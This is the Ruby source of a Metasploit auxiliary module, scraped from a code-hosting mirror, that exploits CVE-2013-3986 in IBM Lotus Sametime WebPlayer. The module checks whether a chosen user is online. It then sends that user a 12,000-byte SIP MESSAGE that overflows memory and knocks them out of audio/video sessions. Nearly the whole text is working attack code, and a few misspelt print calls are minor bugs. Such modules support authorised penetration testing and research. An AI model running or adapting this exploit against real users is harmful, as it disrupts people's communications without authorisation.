CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'IBM Lotus Sametime WebPlayer DoS',12'Description' => %q{13This module exploits a known flaw in the IBM Lotus Sametime WebPlayer14version 8.5.2.1392 (and prior) to cause a denial of service condition15against specific users. For this module to function the target user16must be actively logged into the IBM Lotus Sametime server and have17the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a18browser extension. The user should have the WebPlayer plug-in active19(i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.20},21'Author' =>22[23'Chris John Riley', # Vulnerability discovery24'kicks4kittens' # Metasploit module25],26'License' => MSF_LICENSE,27'Actions' =>28[29['DOS',30{31'Description' => 'Cause a Denial Of Service condition against a connected user'32}33],34['CHECK',35{36'Description' => 'Checking if targeted user is online'37}38]39],40'DefaultAction' => 'DOS',41'References' =>42[43[ 'CVE', '2013-3986' ],44[ 'OSVDB', '99552' ],45[ 'BID', '63611'],46[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21654041' ],47[ 'URL', 'http://xforce.iss.net/xforce/xfdb/84969' ]48],49'DisclosureDate' => '2013-11-07'))5051register_options(52[53Opt::RPORT(5060),54OptAddress.new('RHOST', [true, 'The Sametime Media Server']),55OptString.new('SIPURI', [56true,57'The SIP URI of the user to be targeted',58'<target_email_address>@<sametime_media_server_FQDN>'59]),60OptInt.new('TIMEOUT', [ true, 'Set specific response timeout', 0])61])6263end6465def setup66# cleanup SIP target to ensure it's in the correct format to use67@sipuri = datastore['SIPURI']68if @sipuri[0, 4].downcase == "sip:"69# remove sip: if present in string70@sipuri = @sipuri[4, @sipuri.length]71end72if @sipuri[0, 12].downcase == "webavclient-"73# remove WebAVClient- if present in string74@sipuri = @sipuri[12, @sipuri.length]75end76end7778def run79# inform user of action currently selected80print_status("Action: #{action.name} selected")8182# CHECK action83if action.name == 'CHECK'84print_status("Checking if user #{@sipuri} is online")85if check_user86print_good("User online")87else88print_status("User offline")89end90return91end9293# DOS action94print_status("Checking if user #{@sipuri} is online")95check_result = check_user9697if check_result == false98print_error("User is already offline... Exiting...")99return100end101102# only proceed if action is DOS the target user is103# online or the CHECKUSER option has been disabled104print_status("Targeting user: #{@sipuri}...")105dos_result = dos_user106107if dos_result108print_good("User is offline, DoS was successful")109else110print_error("User is still online")111end112113end114115def dos_user116length = 12000 # enough to overflow the end of allocated memory117msg = create_message(length)118res = send_msg(msg)119120if res.nil?121vprint_good("User #{@sipuri} is no responding")122return true123elsif res =~ /430 Flow Failed/i124vprint_good("DoS packet successful. Response received (430 Flow Failed)")125vprint_good("User #{@sipuri} is no longer responding")126return true127elsif res =~ /404 Not Found/i128vprint_error("DoS packet appears successful. Response received (404 Not Found)")129vprint_status("User appears to be currently offline or not in a Sametime video session")130return true131elsif res =~ /200 OK/i132vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)")133vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer")134return false135else136vprint_status("Unexpected response")137return true138end139end140141# used to check the user is logged into Sametime and after DoS to check success142def check_user143length = Rex::Text.rand_text_numeric(2) # just enough to check response144msg = create_message(length)145res = send_msg(msg)146147# check response for current user status - common return codes148if res.nil?149vprint_error("No response")150return false151elsif res =~ /430 Flow Failed/i152vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)")153return false154elsif res =~ /404 Not Found/i155vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session")156return false157elsif res =~ /200 OK/i158vprint_good("User #{@sipuri} is online")159return true160else161vprint_error("Unknown server response")162return false163end164end165166def create_message(length)167# create SIP MESSAGE of specified length168vprint_status("Creating SIP MESSAGE packet #{length} bytes long")169170source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1)171source_host = Rex::Socket.source_address(datastore['RHOST'])172src = "#{source_host}:#{datastore['RPORT']}"173cseq = Rex::Text.rand_text_numeric(3)174message_text = Rex::Text.rand_text_alphanumeric(length.to_i)175branch = Rex::Text.rand_text_alphanumeric(7)176177# setup SIP message in the correct format expected by the server178data = "MESSAGE sip:WebAVClient-#{@sipuri} SIP/2.0" + "\r\n"179data << "Via: SIP/2.0/TCP #{src};branch=#{branch}.#{"%.8x" % rand(0x100000000)};rport;alias" + "\r\n"180data << "Max-Forwards: 80\r\n"181data << "To: sip:WebAVClient-#{@sipuri}" + "\r\n"182data << "From: sip:#{source_user}@#{src};tag=70c00e8c" + "\r\n"183data << "Call-ID: #{rand(0x100000000)}@#{source_host}" + "\r\n"184data << "CSeq: #{cseq} MESSAGE" + "\r\n"185data << "Content-Type: text/plain;charset=utf-8" + "\r\n"186data << "User-Agent: #{source_user}\r\n"187data << "Content-Length: #{message_text.length}" + "\r\n\r\n"188data << message_text189190return data191end192193def timing_get_once(s, length)194if datastore['TIMEOUT'] and datastore['TIMEOUT'] > 0195return s.get_once(length, datastore['TIMEOUT'])196else197return s.get_once(length)198end199end200201def send_msg(msg)202begin203s = connect204# send message and store response205s.put(msg + "\r\n\r\n") rescue nil206# read response207res = timing_get_once(s, 25)208if res == "\r\n"209# retry request210res = timing_get_once(s, 25)211end212return res213rescue ::Rex::ConnectionRefused214print_status("Unable to connect")215return nil216rescue ::Errno::ECONNRESET217print_good("DoS packet successful, host not responding.")218return nil219rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout220print_status("Couldn't connect")221return nil222ensure223# disconnect socket if still open224disconnect if s225end226end227end228229230